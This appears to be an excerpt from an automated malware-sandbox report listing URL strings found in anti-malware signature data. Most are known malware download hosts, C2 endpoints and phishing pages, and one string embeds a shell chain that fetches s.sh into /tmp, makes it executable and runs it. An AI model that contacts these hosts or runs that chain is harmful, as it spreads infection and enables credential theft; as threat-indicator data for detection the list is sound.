Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://kollinsoy.skyefenton.com:8080/xml.js
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://kolo.crionn.com/kolo.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://kolyherqylwa9ru.top/log.php?f=400
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://korserver.com
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://kp.9
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://kredytinksao.pl/raw.txt
Source: MpSigStub.exe, 00000026.00000003.18330827201.00000138BE3D8000.00000004.00000001.sdmp	String found in binary or memory: http://kremlin-malwrhunterteam.info/scan.exe
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://krisrnilton.pl/mswiner.exe/payload-obfuscated-final.docx
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pcgames.com.cn/games_index.jsp?q=%s
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://ks.pconline.com.cn/index.jsp?qx=download&q=%s
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://ktr.freedynamicdns.org/backups/post.php
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://kubusse.ru/data
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://kungsb2africanbestfootballereverinkerso.duckdns.org/kung2doc/
Source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp	String found in binary or memory: http://kupeer.com/xd
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://kurs.ru/index
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://lab.l4ever.cn/ip/api/
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://laurenbowling.com/redeem-ucount-rewards-standardbank-credit=card-service/php/
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://lavajatowi.sslblindado.com/
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://ldjb.sriki.space/is/cact?i
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://ldvamlwhdpetnyn.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://led21.pro/wp-content/themes/betheme/images/headers/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://lem18iuru03vwvqwt.xyz/ff.gif
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://lexandermagic.com/163-97-242097-905-163-97-242097-799/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://lh.cjishu.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://lhx8z06.sed.nutritionservices.com
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://lialer.com/wFBIQQUccZOdYQKJvhxm/ejrwqokckt.exe
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://librebooton.ddns.net/booton.dot
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://libya2020.com.ly/music.mp3
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://lifeandoil.myjino.ru/crg-bin/c/admin/adobe_pdf/adobe.html
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://lightday.pl/wp-content/themes/lightday/images/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://likesomessfortelr.eu/mSsNX3JDSJD/inNSj398LSj/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://line.largefamiliesonpurpose.com/
Source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp	String found in binary or memory: http://lineacount.info/cgi-bin/
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://linkurytest-bumbleb-stats-westeurope.cloudapp.netxi
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://linux.ghststr.com/lllol/0-o/tmp/s.sh&&cd/tmp/&&chmod777s.sh&&bashs.sh-o-2
Source: MpSigStub.exe, 00000026.00000003.18435819604.00000138BD5EA000.00000004.00000001.sdmp	String found in binary or memory: http://lipostes.tk/98765.pdf
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://livefrom.ge/modules/mod_swfobject/enfo.php
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://liveswindows.cyou/opzi0n1.dll
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://liveupdatesnet.com/
Source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp	String found in binary or memory: http://lk2gaflsgh.jgy658snfyfnvh.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://ll.protected.secured.adobe
Source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp	String found in binary or memory: http://lnk.direct/xzx
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://lnkiy.in/cloudfileshare
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://lo0oading.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://local45.net
Source: MpSigStub.exe, 00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp	String found in binary or memory: http://localhost/st.php
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:4173/BaiduClickerClient.asmx?WSDLx
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:62338/Chipsetsync.asmx
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://localhost:8000/cmd.exe
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.com
Source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp	String found in binary or memory: http://localstormwatch.comx
Source: MpSigStub.exe, 00000026.00000003.18339634370.00000138BD24F000.00000004.00000001.sdmp	String found in binary or memory: http://logger.mobi
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://logins.kl.com.ua/2.msiequati/.native
Source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp	String found in binary or memory: http://logs-01.loggly.com/inputs
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://loisnfernandez.us/Gold/aafile.exe
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc/sp.php?pin=%05d
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://lookfor.cc?pin=%05d
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.cc
Source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp	String found in binary or memory: http://looking-for.ccx
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://loscuerposgloriosos.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://lost.to/in.cgi
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://lostart.info/js/gs.js
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/2efinys.exe
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/c2syst.exe
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/drmlsh.exe
Source: MpSigStub.exe, 00000026.00000003.18309912138.00000138BE5E8000.00000004.00000001.sdmp	String found in binary or memory: http://lowdeck.net/kt2si/icnsys.exe
Source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp	String found in binary or memory: http://lrelectronics.in/czffkte/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://ludnica.uk.to/youtube.xpi
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://luport.com/templates/konkur/language/m
Source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp	String found in binary or memory: http://m.mworld.vn/MWorld30/data20.xm?a=getip&g=3&sex=Android
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mabira.net/traff/controller.php?&ver=8&uid=
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://macr.microfsot.com/noindex.js
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://madthumbs.com/archive/
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://mahathi2.ondemandcreative.com/24.gif
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mail.8u8y.com/ad/pic/123.txt
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.autoshops.online/gbh.exe
Source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp	String found in binary or memory: http://mail.bg
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.daum.net/kocl/
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.google.com/mail/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://mail.madcoffee.com/index.php
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mail.rambler.ru/mail/mail.cgi?mode=compose
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.com
Source: MpSigStub.exe, 00000026.00000003.18332386315.00000138BD293000.00000004.00000001.sdmp	String found in binary or memory: http://maindating.net
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://maithanhduong.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://majelisalanwar.org/wp-content/themes/foodica/assets/css/hp.gf
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://makevalue.com
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://maldonaaloverainc.com/
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://malepad.ru:8080/unmount.js
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://malikberry.com/files101/htamandela.hta
Source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp	String found in binary or memory: http://malwarec2domain.com:3550/implant.exe
Source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp	String found in binary or memory: http://man-u.net/vb/send.php
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.club/files/
Source: MpSigStub.exe, 00000026.00000003.18438557231.00000138BD0C2000.00000004.00000001.sdmp	String found in binary or memory: http://march262020.com/files/
Source: MpSigStub.exe, 00000026.00000003.18333202472.00000138BCD05000.00000004.00000001.sdmp	String found in binary or memory: http://mariafordnude.com/wp/wp-admin/css/colors/coffee/reportexcelindeed.php
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://maringareservas.com.br/queda/index.php
Source: MpSigStub.exe, 00000026.00000003.18348911082.00000138BD189000.00000004.00000001.sdmp	String found in binary or memory: http://markpolak.com
Source: MpSigStub.exe, 00000026.00000003.18303628807.00000138BE85F000.00000004.00000001.sdmp	String found in binary or memory: http://masgiO.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp	String found in binary or memory: http://massenzadrillingrig.com/wp-content/plugins/aa/excelz/index.php?email=
Source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp	String found in binary or memory: http://mastiway.me/wp-includes/
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://mazbit.ovh/mykunaahfxqj/3415201.pngqhttp://mazbit.ovh/mykunaahfxqj/dd(oaoabp%&
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mea45.com/tp/download.php?file=ota4nda5nzm4nl9fx19zzxzrzgl6ztjkcy5legu=-o%appdata%
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://mealpackage.biz/wp-admin/nbn3x/
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://media.licenseacquisition.org/drm_prompt.php
Source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp	String found in binary or memory: http://media.vit
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mediabusnetwork.com/phandler.php?
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://mediaprovider.info/law/?decinformation=
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://mediasportal.com/phandler.php?sid=500&aid=281&said=9&pn=2&pid=3
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mediastop.zigg.me
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mediazone.uni.me/?id=
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mega975.com.ar/sales-invoice/
Source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp	String found in binary or memory: http://megadowl.com/terms-ru.html
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://meganetop.co.jp/imanager/favicon.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://megatoolbar.net/inetcreative/
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://meitao886.com/vass/vasss.doc
Source: MpSigStub.exe, 00000026.00000003.18317408849.00000138BDA0D000.00000004.00000001.sdmp	String found in binary or memory: http://mekund.com/mkcxskjd.exe
Source: MpSigStub.exe, 00000026.00000003.18348616803.00000138BCC0C000.00000004.00000001.sdmp	String found in binary or memory: http://members.concealarea.com/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://memberservices.passport.net/memberservice.srf
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://metclix.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://mexicorxonline.com/glad/imagenes.html?disc=abuse&code=7867213
Source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp	String found in binary or memory: http://mfjr.info/n2l/tmp/m.vbs
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://michiganpppp.com/work/doc/9.doc
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://microhelptech.com/gotoassist/
Source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.browser-security-center.com/blocked.php?id=
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://microsoft.erlivia.ltd/jikolo.doc
Source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://microsoftdata.linkpc.net/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://midfielders.ru/in.cgi?3&group=gdz&seoref=http%3a%2f%2fwww.google.com%2furl%3fsa%3dt%26rct%3dj
Source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa
Source: MpSigStub.exe, 00000026.00000003.18329938261.00000138BD734000.00000004.00000001.sdmp	String found in binary or memory: http://midweekspecials.com/mjrtnfznqsbl/nbsa_
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://millennium-traders.info
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=
Source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp	String found in binary or memory: http://minetopsforums.ru/new_link3.php?site=af
Source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp	String found in binary or memory: http://mining.eligius.st:8337
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://mio98.hk/js_f.php?v=0.0
Source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp	String found in binary or memory: http://misc.wcd.qq.com/app?packageName=pcqqbrowser&channelId=81529
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.net
Source: MpSigStub.exe, 00000026.00000003.18355154038.00000138BCFDB000.00000004.00000001.sdmp	String found in binary or memory: http://missing-codecs.org/download/missing_file
Source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp	String found in binary or memory: http://mitotl.com.mx/ups.com/
Source: MpSigStub.exe, 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp	String found in binary or memory: http://mixbunch.cn/thread.html
Source: MpSigStub.exe, 00000026.00000003.18347687691.00000138BDAD3000.00000004.00000001.sdmp	String found in binary or memory: http://mmm.media-motor.net/install.php?allowsp2=0&protect=no&ttmr=0&retry=3&aff=aimaddict1&mincook=0
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://mmwrlridbhmibnr.ml/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp	String found in binary or memory: http://mndyprivatecloudshareandfileprotecthmvb.freeddns.org/receipt/invoice_
Source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp	String found in binary or memory: http://mnrr.space/c1.xmlx
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://mobilemusicservice.de/43t3f/45y4g.exe
Source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp	String found in binary or memory: http://mobilepcstarterkit.com/
Source: MpSigStub.exe, 00000026.00000003.18331471007.00000138BD776000.00000004.00000001.sdmp	String found in binary or memory: http://modernizr.com
Source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp	String found in binary or memory: http://mods1401z.webcindario.com
Source: MpSigStub.exe, 00000026.00000003.18331150591.00000138BD6B1000.00000004.00000001.sdmp	String found in binary or memory: http://mog.com/
Source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp	String found in binary or memory: http://mondaynews.tk/cam/cm.php?v=
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://monergismbooks.com/
Source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp	String found in binary or memory: http://monergismbooks.com/modules/reportfedexnew.php
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.ico
Source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp	String found in binary or memory: http://montiera.com//favicon.icoa
Source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp	String found in binary or memory: http://mootolola.com/url/YU_ggsetup.html?1218x
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/assno.exe
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://moscow1.online/proxy/skapoland.exe
Source: MpSigStub.exe, 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mosrezerv.ru/ups/
Source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp	String found in binary or memory: http://moveis-schuster-com.ga/Order.jpg
Source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp	String found in binary or memory: http://moveisterrra.com/gb/add.php
Source: MpSigStub.exe, 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp	String found in binary or memory: http://movie1-share123vn.blogspot.com/
Source: MpSigStub.exe, 00000026.00000003.18315823751.00000138BDEF2000.00000004.00000001.sdmp	String found in binary or memory: http://mp.profittrol.com/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.baidu.com/m?tn=baidump3lyric&ct=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://mp3.zhongsou.com/m?w=%s
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecdownload.com
Source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp	String found in binary or memory: http://mp3codecinstall.net/xcdc/installx?id=
Source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp	String found in binary or memory: http://mrbfile.xyz/sql/syslib.dll
Source: MpSigStub.exe, 00000026.00000003.18433827604.00000138BC9C2000.00000004.00000001.sdmp	String found in binary or memory: http://mrdcontact.com/purchaseneworder.doc
Source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp	String found in binary or memory: http://msjupdate.com/ff/extensions/update.rdf
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://msonlineservers.tk/parcel/dugdhl.php
Source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://muacangua.com/wp-admin/o_n/
Source: MpSigStub.exe, 00000026.00000003.18311417254.00000138BCA04000.00000004.00000001.sdmp	String found in binary or memory: http://muahangvn.blogspot.com
Source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp	String found in binary or memory: http://mudu.rugeh.ru
Source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp	String found in binary or memory: http://musah.info/
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://music.cn.yahoo.com/lyric.html?p=%s
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://music.emmigo.in/?r=wmp&title=
Source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp	String found in binary or memory: http://music.soso.com/q?sc=mus&w=%s
Source: MpSigStub.exe, 00000026.00000003.18292082098.00000138BDF35000.00000004.00000001.sdmp	String found in binary or memory: http://music.tfeed.info/?r=wmp&title=
Source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp	String found in binary or memory: http://muzdownload.com
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/
Source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp	String found in binary or memory: http://my-save-img.ru/ip2.php
Source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp	String found in binary or memory: http://my-speak.eu/csioj.exe
Source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp	String found in binary or memory: http://mybestofferstoday.com/cgi-bin/main.cgi?__rnd__
Source: MpSigStub.exe, 00000026.00000003.18348332135.00000138BE958000.00000004.00000001.sdmp	String found in binary or memory: http://mydirecttube.com/
Source: MpSigStub.exe, 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp	String found in binary or memory: http://myip.dnsomatic.com
Source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp	String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/
Source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp	String found in binary or memory: http://myplanet.group/xuxzryvq1/ind.html
Source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp	String found in binary or memory: http://myredir.net/K_
